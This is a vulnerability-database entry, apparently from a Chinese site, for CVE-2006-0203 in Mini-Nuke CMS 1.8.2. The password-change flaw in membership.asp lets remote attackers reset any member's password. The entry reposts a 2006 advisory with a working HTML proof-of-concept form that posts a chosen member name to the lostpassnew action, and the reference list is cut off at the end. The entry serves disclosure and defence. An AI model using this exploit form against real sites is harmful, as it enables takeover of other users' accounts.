Mini-Nuke CMS System 'membership.asp'密码更改漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1196364 漏洞类型 输入验证
发布时间 2006-01-13 更新时间 2006-01-13
CVE编号 CVE-2006-0203 CNNVD-ID CNNVD-200601-134
漏洞平台 N/A CVSS评分 5.0
|漏洞来源
https://www.securityfocus.com/bid/88514
https://cxsecurity.com/issue/WLB-2006010032
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200601-134
|漏洞详情
Mini-NukeCMSSystem1.8.2及更早版本中的membership.asp,在更改密码时不验证旧密码,远程攻击者可以通过具有修改的x参数的lostpassnew操作,更改其他成员的密码。
|漏洞EXP
--Security Report--
Advisory: MiniNuke CMS System <= 1.8.2 (membership.asp) remote user password
change exploit
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 12/01/06 08:49 PM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx (at) nukedx (dot) com [email concealed]
Web: http://www.nukedx.com
}
---
Vendor: MiniNuke (www.miniex.net)
Version: 1.8.2 and prior versions must be affected.
About:Via this method remote attacker can change any users password without
login.
---
How&Example:
HTML Example
[code]
<html>
<title>MiniNuke <= 1.8.2 remote user password change</title>
<form method="POST" action="http://[SITE]/membership.asp?action=lostpassnew">
<table border="0" cellspacing="1" cellpadding="0" align="center" width="75%">
<tr><td colspan="2" align="center"><font face=verdana size=2>Now fill in the
blanks</font></td></tr>
<tr><td colspan="2" align="center"><font face=tahoma size=1red>Change password
</font></td></tr>
<tr><td width="50%" align="right"><font face=verdana size=1>PASSWORD:
</font></td>
<td width="50%"><input type="text" name="pass" size="20"></td></tr>
<tr><td width="50%" align="right"><font face=verdana size=1>PASSWORD Again :
</font></td>
<td width="50%"><input type="text" name="passa" size="20"><input type="text"
name="x" value="Membername">  
<input type="submit" value="Send" name="B1" style="font-family: Verdana;
font-size: 10px; border: 1px ridge #FFFFFF; background-color:
#FFFFFF"></td></tr>
</table></form>
</html>
[/code]
--
Regards,
 From the NWPX team,
nuker a.k.a nukedx
|受影响的产品
Mini-Nuke Cms System 1.8.2
|参考资料

来源:XF
名称:mininuke-membership-change-password(24101)
链接:http://xforce.iss.net/xforce/xfdb/24101
来源:BUGTRAQ
名称:20060113Advisory:MiniNukeCMSSystem<=1.8.2(membership.asp)remoteuserpasswordchangeexploit
链接:http://www.securityfocus.com/archive/1/archive/1/421748/100/0/threaded
来源:OSVDB
名称:22385
链接:http://www.osvdb.org/22385
来源:VUPEN
名称:ADV-2006-0173
链接:http://www.frsirt.com/english/advisories/2006/0173
来源:SECUNIA
名称:18439
链接:http://secunia.com/advisories/18439
来源:FULLDISC
名称:20060112Advisory:MiniNukeCMSSystem<=1.8.2(news.asp)SQLInjectionvulnerability
链接:http://archives.neohapsis.com/archives/fulldisclosure/2006-01/0439.html
来源:FULLDISC
名称:20060112Advisory:MiniNukeCMSSystem<=1.8.2(membership.asp)remoteuserpasswordchangeexploit
链接:http://archives.neohapsis.com/archives/fulldisclosure/2006-01/0437.html
来源:BUGTRAQ
名称:20060129[xpl#2]MiniNuke1.8.2-changemember'spasswrod
链接:http://archives.neohapsis.com/archives/bugtraq/2006-01/0483.html
来源:SREASON
名称:344
链接:http://securityreason.com/securit